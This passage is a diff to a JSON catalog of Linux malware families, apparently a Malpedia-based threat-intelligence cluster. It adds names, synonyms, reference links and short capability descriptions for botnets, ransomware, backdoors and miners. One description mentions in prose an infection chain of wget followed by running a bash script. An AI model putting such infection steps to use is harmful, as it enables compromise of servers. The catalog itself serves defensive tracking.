"17e12216-a303-4a00-8283-d3fe92d0934c", @@ -1587,11 +3270,26 @@ "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot", + "https://blog.netlab.360.com/ddos-botnet-moobot-en/", + "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd8deffe-eb0b-4451-8a13-11f6d291064a", + "value": "MooBot" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" @@ -1602,6 +3300,21 @@ "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", "value": "Moose" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi", + "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", + "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", + "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "236ba358-4c70-434c-a7ac-7a31e76c398a", + "value": "Mozi" + }, { "description": "", "meta": { @@ -1615,6 +3328,56 @@ "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", "value": "MrBlack" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry", + "https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ec8a41f-c72e-4832-a5a4-9d7380cea083", + "value": "Nextcry Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb", + "https://twitter.com/IntezerLabs/status/1324346324683206657", + "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", + "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242", + "value": "Ngioweb (ELF)" + }, + { + "description": "FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin", + "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", + "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/", + "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html" + ], + "synonyms": [ + "remove_bds" + ], + "type": [] + }, + "uuid": "aaeb76b3-3885-4dc6-9501-4504fed9f20b", + "value": "NOTROBIN" + }, { "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { @@ -1634,14 +3397,34 @@ "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", "value": "Owari" }, + { + "description": "According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.p0st5n1f3r", + "https://www.vargroup.it/wp-content/uploads/2019/10/ReverseEngineering_SecurityReport_EN_2019.10.16-2.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cc48c6ae-d274-4ad0-b013-bd75041a20c8", + "value": "p0sT5n1F3r" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", - "https://twitter.com/juanandres_gs/status/944741575837528064", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" + "https://www.youtube.com/watch?v=JXsjRUxx47E", + "https://twitter.com/juanandres_gs/status/944741575837528064" ], "synonyms": [], "type": [] @@ -1654,7 +3437,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", - "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" + "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf", + "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://twitter.com/Nocturnus/status/1308430959512092673", + "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/" ], "synonyms": [ "DDoS Perl IrcBot", @@ -1678,11 +3466,59 @@ "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de3c14aa-f9f4-4071-8e6e-a2c16a3394ad", + "value": "PLEAD (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei", + "https://twitter.com/IntezerLabs/status/1338480158249013250", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b6899bda-54e9-4953-8af5-22af39776b69", + "value": "Prometei" + }, + { + "description": "Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean", + "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/", + "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa918c10-e5c7-4abd-b8c0-3c938a6675f5", + "value": "Pro-Ocean" + }, { "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], @@ -1691,6 +3527,43 @@ "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", "value": "pupy (ELF)" }, + { + "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", + "https://www.anomali.com/blog/the-ech0raix-ransomware", + "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/", + "https://www.qnap.com/en/security-advisory/QSA-20-02", + "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + "https://www.ibm.com/downloads/cas/Z81AVOY7" + ], + "synonyms": [ + "eCh0raix" + ], + "type": [] + }, + "uuid": "a0b12e5f-0257-41f1-beda-001ad944c4ca", + "value": "QNAPCrypt" + }, + { + "description": "The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch", + "https://bin.re/blog/the-dga-of-qsnatch/", + "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", + "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", + "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48389957-30e2-4747-b4c6-8b8a9f15250f", + "value": "QSnatch" + }, { "description": "", "meta": { @@ -1709,7 +3582,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22" ], "synonyms": [], "type": [] @@ -1717,13 +3591,114 @@ "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", "value": "Rakos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx", + "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195" + ], + "synonyms": [ + "Defray777" + ], + "type": [] + }, + "uuid": "946814a1-957c-48ce-9068-fdef24a025bf", + "value": "RansomEXX (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.raspberrypibotnet", + "https://kindredsec.com/2019/06/03/code-analysis-of-basic-cryptomining-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8dee025b-2233-4cd8-af02-fcdcd40b378f", + "value": "RaspberryPiBotnet" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin", + "https://github.com/Thibault-69/RAT-Hodin-v2.5" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6aacf515-de49-4afc-a135-727c9beaab0b", + "value": "rat_hodin" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv", + "https://github.com/Thibault-69/Remote_Shell" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7", + "value": "rbs_srv" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.redxor", + "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "421b2ec7-d4e6-4fc8-9bd3-55fe26337aae", + "value": "RedXOR" + }, + { + "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", + "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", + "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", + "https://vms.drweb.com/virus/?i=7754026&lng=en" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48b9a9fd-4c1a-428a-acc0-40b1a3fa7590", + "value": "Rekoobe" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile", + "https://github.com/f0rb1dd3n/Reptile" + ], + "synonyms": [], + "type": [] + }, + "uuid": "934478a1-1243-4c26-8360-be3d01ae193e", + "value": "reptile" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", - "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", - "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" + "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" ], "synonyms": [], "type": [] @@ -1731,6 +3706,33 @@ "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", "value": "Rex" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus", + "https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "af886910-9a0b-478e-b53d-54c8a103acb4", + "value": "RHOMBUS" + }, + { + "description": "P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.roboto", + "https://blog.netlab.360.com/the-awaiting-roboto-botnet-en", + "https://www.zdnet.com/article/new-roboto-botnet-emerges-targeting-linux-servers-running-webmin" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e18bf514-b978-4bef-b4d9-834a5100fced", + "value": "Roboto" + }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { @@ -1775,12 +3777,40 @@ "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", "value": "Shishiga" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.silex", + "https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/" + ], + "synonyms": [ + "silexbot" + ], + "type": [] + }, + "uuid": "bf059cb4-f73a-4181-bf71-d8da7bf50dd8", + "value": "Silex" + }, + { + "description": "According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick", + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351", + "value": "SLAPSTICK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", - "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" + "https://cis.verint.com/2016/11/08/spamtorte-version-2/" ], "synonyms": [], "type": [] @@ -1801,11 +3831,40 @@ "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", "value": "SpeakUp" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter", + "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b9ed5797-b591-4ca9-ba77-ce86308e333a", + "value": "Specter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "df23ae3a-e10d-4c49-b379-2ea2fd1925af", + "value": "Speculoos" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", + "https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" ], "synonyms": [], @@ -1819,7 +3878,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", + "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/", + "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", + "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/" ], "synonyms": [], "type": [] @@ -1827,6 +3891,20 @@ "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, + { + "description": "According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi", + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "21ff33b5-ef21-4263-8747-7de3d2dbdde6", + "value": "STEELCORGI" + }, { "description": "", "meta": { @@ -1840,6 +3918,63 @@ "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", "value": "Sunless" }, + { + "description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes", + "https://marcoramilli.com/2018/09/20/sustes-malware-cpu-for-monero/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5c117b01-826b-4656-b6ca-8b18b6e6159f", + "value": "sustes miner" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", + "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool", + "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", + "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "24695f84-d3af-477e-92dd-c05c9536ebf5", + "value": "TeamTNT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon", + "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers", + "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ed098719-797b-4cb3-a73c-65b6d08ebdfa", + "value": "TheMoon" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00319b53-e31c-4623-a3ac-9a18bc52bf36", + "value": "TNTbotinger" + }, { "description": "", "meta": { @@ -1866,15 +4001,52 @@ "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", "value": "Trump Bot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie", + "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "synonyms": [], + "type": [] + }, + "uuid": "592f7cc6-1e07-4d83-8082-aef027e9f1e2", + "value": "TSCookie" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh", + "https://github.com/creaktive/tsh" + ], + "synonyms": [], + "type": [] + }, + "uuid": "95a07de2-0e17-48a7-b935-0c1c0c0e39af", + "value": "tsh" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "https://blog.aquasec.com/fileless-malware-container-security", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "http://get.cyberx-labs.com/radiation-report", - "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", - "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/" + "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" ], "synonyms": [ "Amnesia", @@ -1914,16 +4086,48 @@ "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", "value": "Umbreon" }, + { + "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in linux email servers. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001", + "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5b59d9f-f9e2-4201-a017-f2bae0470808", + "value": "Unidentified Linux 001" + }, + { + "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002", + "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec", + "value": "Unidentified Linux 002" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", + "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf", "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" @@ -1934,11 +4138,56 @@ "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", "value": "elf.vpnfilter" }, + { + "description": "According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog", + "https://intezer.com/blog/linux/watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa00d8c9-b479-4d05-9887-cd172a11cfc9", + "value": "WatchBog" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "93ffafbd-a8af-4164-b3ab-9b21e6d09232", + "value": "WellMail" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + 